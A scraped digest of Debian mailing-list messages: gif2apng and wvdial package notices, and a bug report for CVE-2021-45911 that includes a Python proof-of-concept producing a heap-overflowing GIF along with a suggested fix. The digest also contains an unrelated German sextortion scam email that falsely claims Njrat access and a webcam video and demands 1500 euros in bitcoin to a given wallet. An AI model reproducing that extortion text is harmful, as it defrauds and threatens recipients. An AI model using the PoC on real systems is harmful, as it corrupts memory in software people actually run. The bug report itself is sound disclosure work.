Helmut Grohne Wed, 24 Jul 2019 22:16:47 +0200 + gif2apng (1.9+srconly-3) unstable; urgency=medium * QA upload. diff --minimal -Nru gif2apng-1.9+srconly/debian/rules gif2apng-1.9+srconly/debian/rules --- gif2apng-1.9+srconly/debian/rules 2016-11-11 06:49:20.0 +0100 +++ gif2apng-1.9+srconly/debian/rules 2019-07-24 22:16:45.0 +0200 @@ -8,6 +8,7 @@ export DEB_CFLAGS_MAINT_APPEND = -Wall -pedantic export DEB_LDFLAGS_MAINT_APPEND = -Wl,--as-needed +-include /usr/share/dpkg/buildtools.mk CFLAGS = $(shell dpkg-buildflags --get CFLAGS) CPPFLAGS = $(shell dpkg-buildflags --get CPPFLAGS) LDFLAGS = $(shell dpkg-buildflags --get LDFLAGS) --- End Message --- --- Begin Message --- Version: 1.9+srconly-3+rm Dear submitter, as the package gif2apng has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1004933 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#1002687: marked as done (gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function)
Your message dated Mon, 07 Feb 2022 21:43:10 +
with message-id
and subject line Bug#1004933: Removed package(s) from unstable
has caused the Debian Bug report #1002687,
regarding gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of
delays in the main function
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
1002687: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002687
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: gif2apng
Version: 1.9+srconly-3
Severity: important
Tags: security
Dear Maintainer,
There is a heap based buffer overflow in the main function of the gif2apng
application. The responsible code looks as follows:
delays = (unsigned short *)malloc(frames*2);
if (delays == NULL)
return 1;
[...]
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1) delays[n] = delay;
}
The variable n is used to count the frames. The problem is that if we enter the
if statement at the very end of the gif file, then n is equal to frames. This
means, that the write to the delays buffer overwrites the two bytes after the
delays buffer.
The following script generates a poc.gif file, that should cause a crash:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"
data = sig + w + h + flags_one + bcolor + aspect
f.write(data)
# Writting more frames to produce crash:
for i in range(0,28):
# Going into the id 0x2c path, so that there is a frame
id = b"\x2c"
w0 = b"\x01\x00"
y0 = b"\x00\x00"
x0 = b"\x00\x00"
h0 = b"\x01\x00" # Getting past our own size checks
flags_two = b"\x00"
data = id + x0 + y0 + w0 + h0 + flags_two
f.write(data)
# DecodeLZW
mincode = b"\x07"
f.write(mincode)
for i in range(0,512):
# Size value and byte we write to the heap
target_char = b"\x01" + b"A"
f.write(target_char)
# Resetting the values using "clearcode" to keep the code path as
simple as possible
clear_code = b"\x01" + b"\x80"
f.write(clear_code)
# Leaving function
target_char = b"\x00"
f.write(target_char)
# Triggering the vulnerable code path
id = b"\x21"
val = b"\xf9"
size = b"\xff"
flags_two = b"\x00"
delay = b"\xff\xff"
t = b"\x00"
end = b"\x00"
data = id + val + size + flags_two + delay + t + end
f.write(data)
# Breaking out of while loop
f.write(b"")
f.close()
The generated poc.gif file causes a memory curruption on the heap when
converted with the current gif2apng version:
$ gif2apng -i0 poc.gif /dev/null
gif2apng 1.9 using ZLIB
Reading 'poc.gif'...
28 frames.
Writing 'poc.png'...
28 frames.
munmap_chunk(): invalid pointer
Abgebrochen
This buffer overflow allows an attacker to write two arbitrary bytes after the
delays buffer.
I did a rudimentary fix in my local version of the program by adding a boundary
check to the if statement in the code:
if (val == 0xF9)
{
if (fread(&size, 1, 1, f1) != 1) return 1;
if (fread(&flags, 1, 1, f1) != 1) return 1;
if (fread(&delay, 2, 1, f1) != 1) return 1;
if (fread(&t, 1, 1, f1) != 1) return 1;
if (fread(&end, 1, 1, f1) != 1) return 1;
has_t = flags & 1;
dispose_op = (flags >> 2) & 7;
if (dispose_op > 3) dispose_op = 3;
if (dispose_op == 3 && n == 0) dispose_op = 2;
if (delay > 1 && n < frames) {
delays[n] = delay;
}
}
This fixed the crash for me locally. However I am not sure if this is a clean
solution as I have no idea if this can happen in a valid image. If this code
path is not possible in a valid image it might be better to stop processing the
image at this point.
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kerne
Bug#1004933: Removed package(s) from unstable
We believe that the bug you reported is now fixed; the following package(s) have been removed from unstable: gif2apng | 1.9+srconly-3 | source, amd64, arm64, armel, armhf, i386, mips64el, mipsel, ppc64el, s390x --- Reason --- RoQA; dead upstream, open security issues -- Note that the package(s) have simply been removed from the tag database and may (or may not) still be in the pool; this is not a bug. The package(s) will be physically removed automatically when no suite references them (and in the case of source, when no binary references it). Please also remember that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. Packages are usually not removed from testing by hand. Testing tracks unstable and will automatically remove packages which were removed from unstable when removing them from testing causes no dependency problems. The release team can force a removal from testing if it is really needed, please contact them if this should be the case. We try to close bugs which have been reported against this package automatically. But please check all old bugs, if they were closed correctly or should have been re-assigned to another package. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1004...@bugs.debian.org. The full log for this bug can be viewed at https://bugs.debian.org/1004933 This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)
Bug#1004933: Removed package(s) from unstable
Version: 1.9+srconly-3+rm Dear submitter, as the package gif2apng has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1004933 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)
Benachrichtigung
Hallo! Wie Sie vielleicht bemerkt haben, habe ich Ihnen eine E-Mail von Ihrem Konto gesendet. Das bedeutet, dass ich vollen Zugriff auf Ihr Konto habe. Ich beobachte dich jetzt seit einigen Monaten. Tatsache ist, dass Sie über eine Website für Erwachsene, die Sie besucht haben, mit Njrat infiziert wurden. Wenn Sie damit nicht vertraut sind, werde ich es erklären. Njrat gibt mir vollen Zugriff und die Kontrolle über Ihr Gerät. Das bedeutet, dass ich alles auf deinem Bildschirm sehen kann, die Kamera und das Mikrofon einschalten kann, aber du weißt nichts davon. Ich habe auch Zugriff auf alle Ihre Kontakte und Ihre gesamte Korrespondenz. Ich habe ein Video gemacht, das zeigt, wie Sie sich in der linken Hälfte des Bildschirms befriedigen, und in der rechten Hälfte sehen Sie das Video, das Sie sich angesehen haben. Mit einem Mausklick kann ich dieses Video an alle Ihre E-Mails und Kontakte in sozialen Netzwerken senden. Ich kann auch den Zugriff auf alle Ihre E-Mail-Korrespondenz und Messenger, die Sie verwenden, veröffentlichen. Wenn Sie dies verhindern möchten, überweisen Sie den Betrag von 1500 euro an meine Bitcoin-Adresse (wenn Sie nicht wissen, wie das geht, schreiben Sie an Google: „Bitcoin kaufen“). Meine Bitcoin-Adresse (BTC Wallet) lautet: 1PA5CDyDb7KrYu3Sjc8UWdKv3BzMyG8sfx Nach Zahlungseingang lösche ich das Video und du wirst mich nie wieder hören. Ich gebe Ihnen 48 Stunden zum Bezahlen. Ich habe eine Nachricht, die diesen Brief liest, und der Timer wird funktionieren, wenn Sie diesen Brief sehen. Es macht keinen Sinn, irgendwo eine Beschwerde einzureichen, da diese E-Mail nicht wie meine Bitcoin-Adresse verfolgt werden kann. Ich mache keine Fehler. Wenn ich feststelle, dass Sie diese Nachricht mit jemand anderem geteilt haben, wird das Video sofort verteilt. Freundliche Grüße!
Processing of wvdial_1.61-6_source.changes
wvdial_1.61-6_source.changes uploaded successfully to localhost along with the files: wvdial_1.61-6.dsc wvdial_1.61-6.debian.tar.xz wvdial_1.61-6_source.buildinfo Greetings, Your Debian queue daemon (running on host usper.debian.org)
wvdial_1.61-6_source.changes ACCEPTED into unstable
Accepted: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sun, 06 Feb 2022 20:38:20 -0300 Source: wvdial Architecture: source Version: 1.61-6 Distribution: unstable Urgency: medium Maintainer: Debian QA Group Changed-By: Joao Eriberto Mota Filho Changes: wvdial (1.61-6) unstable; urgency=medium . * QA upload. * Migrations: - debian/copyright to 1.0 format. - debian/rules to new (reduced) format. Consequently: ~ debian/clean: created to remove files created when building the wvdial. ~ debian/install: created to install pon.wvdial and poff.wvdial. ~ debian/wvdial.dirs: no longer needed. Removed. ~ debian/wvdial.manpages: - Renamed to manpages. - Removed wvdial.1, wvdialconf.1 and wvdial.conf.5, to be installed via Makefile. * Using new DH level format. Consequently: - debian/compat: removed. - debian/control: changed from 'debhelper' to 'debhelper-compat' in Build-Depends field and bumped level to 13. * Ran wrap-and-sort. * debian/control: - Added 'Rules-Requires-Root: no' to source stanza. - Added Vcs-* fields. - Bumped Standards-Version to 4.6.0. * debian/patches/: - Added a numeric prefix to all patch names. - 020_ftbfs_with_gcc_4.5.patch: added a header. * debian/po/: renamed 'wvdial.templates' to 'templates' in all files. * debian/salsa-ci.yml: added to provide CI tests for Salsa. * debian/tests/control: created to provide CI tests. * debian/watch: added a fake site to explain about the current status of the original upstream homepage. * debian/wvdial.docs: renamed to docs. * debian/wvdial.links: renamed to links. * debian/wvdial.postinst: renamed to postinst. * debian/wvdial.postrm: renamed to postrm. * debian/wvdial.templates: renamed to templates. Checksums-Sha1: 62f83ff750febeab659578a2b8d83822898e88ef 1897 wvdial_1.61-6.dsc 4bbde60b07282330f26ae4198db0281bbdb0640f 21088 wvdial_1.61-6.debian.tar.xz 443710c1fa902c96dc2e0dfedfe9392ed559b690 5863 wvdial_1.61-6_source.buildinfo Checksums-Sha256: ab792825c3f00b6d7ba83000cf42a7bd344bafb9a2d0c0e392fa8197684eda95 1897 wvdial_1.61-6.dsc 292e779e593ac4f45049f149566252aaa59abe70085c126489131d80e9892bc9 21088 wvdial_1.61-6.debian.tar.xz 193322fce65a85b3566da82353b30f1925ebe692f5421fe1d7b6acf2edbdc9f0 5863 wvdial_1.61-6_source.buildinfo Files: 16c1d3150568f102e8a10ac5bf5d583e 1897 comm optional wvdial_1.61-6.dsc be8692e470abfc358731496e8d5852ee 21088 comm optional wvdial_1.61-6.debian.tar.xz 54bb7f8d5f719b37b338bf2fe7de6a77 5863 comm optional wvdial_1.61-6_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEENX3LDuyVoBrrofDS3mO5xwTr6e8FAmIB1JIACgkQ3mO5xwTr 6e/H5g//ff1xyJTDf2Wfc+Yqx0jXueyhhqF7oRiByEVlYkbMiGxlRdeNvJJ8iM+V 0fCJ4rT1Z3PLw4+pRzbFPCMmZMOCuiFa69QxtyTxzWxDLUKZ7Awrb59ppLdBG0nF 8duL5LAUF3yy+sr60tXBk/6WPGkjGOK+zBb17owIF7nwtb31pEMFiUYmFu0YLyOs SZkCDJpqq/vIDkVp0nocHSHaT7m9qBFWE/zJrvGYqVq3Rto0YrK5Xwl5djpaKd/B q+TFU4c/TX0c7YG4qNxZdJ1JaAc7pym+cj2y7WeYL96KJVNE2CrxpYtRRa3pzuzQ upAQkxw3L9YJNm0wFHQusp3IUYoWATOukFJsz/mMXlnfM2lgpv5CABEvghhgWEB+ iIN3GxKjfwoL45yD9ro4pcU15Q/nyQoIpIDxDRsvof1JhDyf836fMG/6dJkztCPF R2jPbzBa6qyiT8D5oiSn2rmbFG+cjQwDMyMcvKlPPGYz2Ijk5VA+ojvnBVV/jB7b gI9kNVbBbUNy2dtRX3Dl7zLiOrRV2vnzrcpquyOjzI8BgjDEFp3+2gvS+BS1QadN +IiDuOk45u4stHDGPP2kmu91F7XisCt7dKtGjUfjVH5N2fhQiaA4zJJsSuyGdcaF zRXpAOyc5wkOPybTo6dwBoJwHNMqpVr/MUP2C2wiBTLTFhnXUW0= =Tuy/ -END PGP SIGNATURE- Thank you for your contribution to Debian.
